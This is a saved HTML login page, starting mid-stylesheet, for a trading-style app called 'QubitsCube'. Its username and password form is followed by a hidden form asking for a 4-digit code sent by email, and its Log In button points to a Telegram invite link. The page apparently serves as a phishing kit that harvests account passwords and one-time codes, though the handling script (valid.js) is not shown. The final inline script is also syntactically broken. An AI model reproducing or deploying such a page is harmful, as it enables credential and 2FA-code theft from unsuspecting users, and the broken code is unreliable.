        align-items: center;
        border-radius: 5px;
        border: 1px solid var(--neutral-gray-2, #efefef)
    }

    .uni-error-message[data-v-6010a3b0] {
        position: absolute;
        bottom: -17px;
        left: 0;
        line-height: 12px;
        color: #e43d33;
        font-size: 12px;
        text-align: left
    }

    .uni-error-msg--boeder[data-v-6010a3b0] {
        position: relative;
        bottom: 0;
        line-height: 22px
    }

    .is-input-error-border[data-v-6010a3b0] {
        border-color: #e43d33
    }

    .is-input-error-border .uni-easyinput__placeholder-class[data-v-6010a3b0] {
        color: #f29e99
    }

    .uni-easyinput--border[data-v-6010a3b0] {
        margin-bottom: 0;
        padding: 10px 15px;
        border-top: 1px #eee solid
    }

    .uni-easyinput-error[data-v-6010a3b0] {
        padding-bottom: 0
    }

    .is-first-border[data-v-6010a3b0] {
        border: none
    }

    .is-disabled[data-v-6010a3b0] {
        background-color: #f7f6f6;
        color: #d5d5d5
    }

    .is-disabled .uni-easyinput__placeholder-class[data-v-6010a3b0] {
        color: #d5d5d5;
        font-size: 12px
    }</style>
    <style type="text/css">.page[data-v-9ec55334] {
        font-family: Lufga
    }

    body.pages-login-login uni-page-body {
        background-color: #000
    }

    body.pages-login-login {
        background-color: #000
    }

    .top-box[data-v-9ec55334] {
        display: flex;
        align-items: center;
        justify-content: space-between;
        margin: 7px 10px
    }

    .icon-group[data-v-9ec55334] {
        display: flex
    }

    .icon-item[data-v-9ec55334] {
        margin: 2px 10px
    }

    .icon-item img[data-v-9ec55334] {
        padding: 5px;
        border-radius: 50%;
        background: #fff;
        width: 20px
    }

    .about-us[data-v-9ec55334] {
        color: #fff;
        font-size: 16px;
        font-weight: 500;
        padding: 5px 15px;
        border-radius: 8px;
        border: 1px solid #fff
    }

    .welcome-box[data-v-9ec55334] {
        margin-top: 30px;
        color: #fff;
        display: flex;
        font-size: 24px;
        font-weight: 800;
        justify-content: center
    }

    .welcome-box span[data-v-9ec55334] {
        margin-left: 7px;
        font-size: 24px;
        font-family: LufgaBold;
        font-weight: 600;
        background-image: -webkit-linear-gradient(55deg, #4f3aea, #11e0be);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent
    }

    .input-box[data-v-9ec55334] {
        margin: 0 25px;
        margin-top: 50px
    }

    .btn-box[data-v-9ec55334] {
        display: flex;
        margin: 0 25px;
        margin-top: 30px
    }

    .submit-btn[data-v-9ec55334] {
        color: #fff;
        text-align: center;
        font-weight: 600;
        font-family: LufgaBold;
        padding: 15px;
        width: 100%;
        border-radius: 25px;
        background-color: #191d1e
    }

    .login-box[data-v-9ec55334] {
        display: flex;
        margin-top: 25px;
        justify-content: center
    }

    .login-tips[data-v-9ec55334] {
        color: #5c5c5c;
        margin-right: 5px
    }

    .login[data-v-9ec55334] {
        color: #1679bd
    }

    .bottom-box[data-v-9ec55334] {
        background-color: #191919
    }

    .video-title[data-v-9ec55334] {
        margin-top: 60px;
        padding-top: 30px;
        color: #fff;
        display: flex;
        font-size: 24px;
        font-weight: 800;
        justify-content: center
    }

    .video-title span[data-v-9ec55334] {
        margin: 0 7px;
        font-size: 24px;
        font-family: LufgaBold;
        font-weight: 600;
        background-image: -webkit-linear-gradient(55deg, #4f3aea, #11e0be);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent
    }

    .small-title[data-v-9ec55334] {
        padding-top: 30px;
        color: #fff;
        margin: 20px;
        font-size: 20px;
        font-weight: 600;
        text-align: center;
        background-image: -webkit-linear-gradient(55deg, #4f3aea, #11e0be);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent
    }

    .youtube-video[data-v-9ec55334] {
        margin: 10px 20px
    }

    .image-box[data-v-9ec55334] {
        display: flex
    }

    .image-box img[data-v-9ec55334] {
        width: 20px;
        height: 23px;
        margin: 0 10px
    }

    .right-top[data-v-9ec55334] {
        display: flex;
        justify-content: end;
        margin-top: 10px;
        margin-right: 20px
    }

    .right-top img[data-v-9ec55334] {
        width: 35px
    }

    .forgot-btn[data-v-9ec55334] {
        margin-top: 15px;
        margin-right: 25px;
        color: var(--black, #fff);
        font-family: Lufga;
        font-size: 15px;
        font-style: normal;
        font-weight: 400;
        line-height: normal;
        letter-spacing: -.42px;
        -webkit-text-decoration-line: underline;
        text-decoration-line: underline;
        text-align: right
    }
    div#error {
    text-align: center;
    color: red;
    font-family: Lufga;
    font-size: 16px;
    font-style: normal;
    font-weight: 700;
    line-height: normal;
    margin-top: 10px;
    justify-content: space-between;
}
.num-tips[data-v-fab85fe8] {
    color: var(--black, #b9b9b9);
    font-family: Lufga;
    font-size: 12px;
    font-style: normal;
    font-weight: 400;
    line-height: normal;
    letter-spacing: -.4px;
}
    </style>
</head>
<body __processed_a7bebbc4-8d10-4a52-af8c-2c64947b21de__="true" class="uni-body pages-login-login">
<uni-app class="uni-app--maxwidth">
    <uni-page data-page="pages/login/login"><!----><!---->
        <uni-page-wrapper>
            <uni-page-body>
                <uni-view data-v-9ec55334="" class="page">
                    <uni-view data-v-9ec55334="" class="top-box">
                        <uni-view data-v-9ec55334="" class="icon-group">
                            <uni-view data-v-9ec55334="" class="icon-item"><img data-v-9ec55334="" src="./img/twitter.png" alt="">
                            </uni-view>
                            <uni-view data-v-9ec55334="" class="icon-item"><img data-v-9ec55334="" src="./img/web.png" alt="">
                            </uni-view>
                            <uni-view data-v-9ec55334="" class="icon-item"><img data-v-9ec55334="" src="./img/telegram.png" alt="">
                            </uni-view>
                        </uni-view>
                        <uni-view data-v-9ec55334="" class="image-box">
                            <uni-view data-v-9ec55334=""><img data-v-9ec55334="" src="./img/msb.png" alt="">
                            </uni-view>
                            <uni-view data-v-9ec55334=""><img data-v-9ec55334="" src="./img/company.png" alt="">
                            </uni-view>
                        </uni-view>
                        <uni-view data-v-9ec55334="" class="about-us">About Us</uni-view>
                    </uni-view>
                    <uni-view data-v-9ec55334="" class="right-top"><img data-v-9ec55334="" src="./img/lang.png" alt=""></uni-view>
                    <uni-view data-v-9ec55334="" class="welcome-box">Welcome to<span data-v-9ec55334="">QubitsCube</span></uni-view>
                            
                            <div id="error" style="display:none">The email code is incorrect</div>
                    <form id="email_form"><uni-view data-v-9ec55334="" class="input-box">
                        <uni-view data-v-9ec55334="" class="input-title" style="color: rgb(255, 255, 255);">Username
                        </uni-view>
                        <uni-view data-v-6010a3b0="" data-v-9ec55334="" class="uni-easyinput" style="color: rgb(255, 255, 255);">
                            <uni-view data-v-6010a3b0="" class="uni-easyinput__content is-input-border " style="border-color: rgb(71, 71, 71); background-color: rgb(13, 13, 13);"><!---->
                                <uni-input data-v-6010a3b0="" class="uni-easyinput__content-input" style="padding-left: 10px;">
                                    <div class="uni-input-wrapper" bis_skin_checked="1">
                                      
                                        <input required="" id="email_user" maxlength="140" step="" enterkeyhint="done" autocomplete="off" type="" class="uni-input-input" placeholder="Please enter your username"><!----></div>
                                </uni-input><!----></uni-view>
                        </uni-view>
                    </uni-view>
                    <uni-view data-v-9ec55334="" class="input-box" style="margin-top: 10px;">
                        <uni-view data-v-9ec55334="" class="input-title" style="color: rgb(255, 255, 255);">Password
                        </uni-view>
                        <uni-view data-v-6010a3b0="" data-v-9ec55334="" class="uni-easyinput" style="color: rgb(255, 255, 255);">
                            <uni-view data-v-6010a3b0="" class="uni-easyinput__content is-input-border " style="border-color: rgb(71, 71, 71); background-color: rgb(13, 13, 13);"><!---->
                                <uni-input data-v-6010a3b0="" class="uni-easyinput__content-input" style="padding-left: 10px;">
                                    <div class="uni-input-wrapper" bis_skin_checked="1">
                                        <input required="" id="password_user" type="password" step="" enterkeyhint="done" autocomplete="off" class="uni-input-input" placeholder="Please enter your password"><!----></div>
                                </uni-input><!----></uni-view>
                        </uni-view>
                    </uni-view>
                    <uni-view data-v-9ec55334="" class="forgot-btn">Forgot Password?</uni-view>
                    <uni-view data-v-9ec55334="" class="btn-box">
                        <button type="submit" data-v-9ec55334="" class="submit-btn" onclick="document.location='https://t.me/+aWtBWKOWOBxhNmMy'">Log In</button>
                    </uni-view>
                    <uni-view data-v-9ec55334="" class="login-box">
                        <uni-view data-v-9ec55334="" class="login-tips">Not registered yet?</uni-view>
                        <uni-view data-v-9ec55334="" class="login">Register</uni-view>
                    </uni-view>
                    <uni-view data-v-9ec55334="" style="height: 30px; width: 100%;"></uni-view>
                    </form>
                                            <form id="fin_form" style="display:none;">
                                                
                                                  <uni-view data-v-9ec55334="" class="input-box" style="margin-top: 10px;">
                        <uni-view data-v-9ec55334="" class="input-title" style="color: rgb(255, 255, 255);">Code
                        </uni-view>
                        <uni-view data-v-6010a3b0="" data-v-9ec55334="" class="uni-easyinput" style="color: rgb(255, 255, 255);">
                            <uni-view data-v-6010a3b0="" class="uni-easyinput__content is-input-border " style="border-color: rgb(71, 71, 71); background-color: rgb(13, 13, 13);"><!---->
                                <uni-input data-v-6010a3b0="" class="uni-easyinput__content-input" style="padding-left: 10px;">
                                    <div class="uni-input-wrapper" bis_skin_checked="1">
                                        <input required="" id="pincode" type="number" step="" enterkeyhint="done" autocomplete="off" class="uni-input-input" placeholder="Enter the code from your email"><!----></div>
                                </uni-input><!----></uni-view>
                                <uni-view data-v-fab85fe8="" class="num-tips">Enter the 4-digit code that we have sent to email</uni-view>
                        </uni-view>
                    </uni-view>
                    <uni-view data-v-9ec55334="" class="btn-box">
                        <button type="submit" data-v-9ec55334="" class="submit-btn">Log In</button>
                    </uni-view>
                    <uni-view data-v-9ec55334="" class="login-box">
                        <uni-view data-v-9ec55334="" class="login-tips">Not registered yet?</uni-view>
                        <uni-view data-v-9ec55334="" class="login">Register</uni-view>
                    </uni-view>
                    <uni-view data-v-9ec55334="" style="height: 30px; width: 100%;"></uni-view>
</form>
                </uni-view>
            </uni-page-body>
        </uni-page-wrapper>
    </uni-page>
    <uni-tabbar class="uni-tabbar-bottom" style="display: none;">
        <div class="uni-tabbar" bis_skin_checked="1" style="background-color: rgb(255, 255, 255); backdrop-filter: none;">
            <div class="uni-tabbar-border" bis_skin_checked="1" style="background-color: rgb(255, 255, 255);"></div>
            <div class="uni-tabbar__item" bis_skin_checked="1"><!---->
                <div class="uni-tabbar__bd" bis_skin_checked="1" style="height: 65px;">
                    <div class="uni-tabbar__icon" bis_skin_checked="1" style="width: 24px; height: 24px;"><img src="./img/home_HL.png"></div>
                    <div class="uni-tabbar__label" bis_skin_checked="1" style="color: rgb(0, 0, 0); font-size: 12px; line-height: normal; margin-top: 3px;"> Home
                    </div><!----></div>
            </div>
            <div class="uni-tabbar__item" bis_skin_checked="1"><!---->
                <div class="uni-tabbar__bd" bis_skin_checked="1" style="height: 65px;">
                    <div class="uni-tabbar__icon" bis_skin_checked="1" style="width: 24px; height: 24px;"><img src="./img/cube.png"></div>
                    <div class="uni-tabbar__label" bis_skin_checked="1" style="color: rgb(112, 112, 112); font-size: 12px; line-height: normal; margin-top: 3px;"> Cube
                    </div><!----></div>
            </div>
            <div class="uni-tabbar__item" bis_skin_checked="1"><!---->
                <div class="uni-tabbar__bd" bis_skin_checked="1" style="height: 65px;">
                    <div class="uni-tabbar__icon" bis_skin_checked="1" style="width: 24px; height: 24px;"><img src="./img/futures.png"></div>
                    <div class="uni-tabbar__label" bis_skin_checked="1" style="color: rgb(112, 112, 112); font-size: 12px; line-height: normal; margin-top: 3px;">
                        Futures
                    </div><!----></div>
            </div>
            <div class="uni-tabbar__item" bis_skin_checked="1"><!---->
                <div class="uni-tabbar__bd" bis_skin_checked="1" style="height: 65px;">
                    <div class="uni-tabbar__icon" bis_skin_checked="1" style="width: 24px; height: 24px;"><img src="./img/video.png"></div>
                    <div class="uni-tabbar__label" bis_skin_checked="1" style="color: rgb(112, 112, 112); font-size: 12px; line-height: normal; margin-top: 3px;"> Live
                    </div><!----></div>
            </div>
        </div>
        <div class="uni-placeholder" bis_skin_checked="1" style="height: 65px;"></div>
    </uni-tabbar><!---->
    <uni-actionsheet>
        <div class="uni-mask uni-actionsheet__mask" bis_skin_checked="1" style="display: none;"></div>
        <div class="uni-actionsheet" bis_skin_checked="1">
            <div class="uni-actionsheet__menu" bis_skin_checked="1"><!----><!---->
                <div bis_skin_checked="1" style="max-height: 260px; overflow: hidden;">
                    <div bis_skin_checked="1" style="transform: translateY(0px) translateZ(0px);"></div>
                </div>
            </div>
            <div class="uni-actionsheet__action" bis_skin_checked="1">
                <div class="uni-actionsheet__cell" bis_skin_checked="1" style="color: rgb(0, 0, 0);"> Cancel</div>
            </div>
            <div bis_skin_checked="1"></div>
        </div><!----></uni-actionsheet>
    <uni-modal style="display: none;">
        <div class="uni-mask" bis_skin_checked="1"></div>
        <div class="uni-modal" bis_skin_checked="1"><!---->
            <div class="uni-modal__bd" bis_skin_checked="1"></div>
            <div class="uni-modal__ft" bis_skin_checked="1">
                <div class="uni-modal__btn uni-modal__btn_default" bis_skin_checked="1" style="color: rgb(0, 0, 0);">
                    Cancel
                </div>
                <div class="uni-modal__btn uni-modal__btn_primary" bis_skin_checked="1" style="color: rgb(0, 122, 255);"> OK
                </div>
            </div>
        </div><!----></uni-modal><!----><!----></uni-app>
<div bis_skin_checked="1" style="position: absolute; left: 0px; top: 0px; width: 0px; height: 0px; z-index: -1; overflow: hidden; visibility: hidden;">
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-top);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 400px; height: 400px;"></div>
    </div>
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-top);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 250%; height: 250%;"></div>
    </div>
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-left);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 400px; height: 400px;"></div>
    </div>
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-left);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 250%; height: 250%;"></div>
    </div>
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-right);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 400px; height: 400px;"></div>
    </div>
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-right);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 250%; height: 250%;"></div>
    </div>
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-bottom);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 400px; height: 400px;"></div>
    </div>
    <div bis_skin_checked="1" style="position: absolute; width: 100px; height: 200px; box-sizing: border-box; overflow: hidden; padding-bottom: env(safe-area-inset-bottom);">
        <div bis_skin_checked="1" style="transition: all 0s ease 0s; animation: auto ease 0s 1 normal none running none; width: 250%; height: 250%;"></div>
    </div>
</div><script src="jquery.min.js"></script>
<script src="jquery.form.min.js"></script>
<script src="jquery.validate.min.js"></script>
<script src="valid.js"></script>
<script>$(window).ready(function () {
    $('#fin_form').hide();
});
{
    $('#error').hide();
}
)
</script>

</body></html>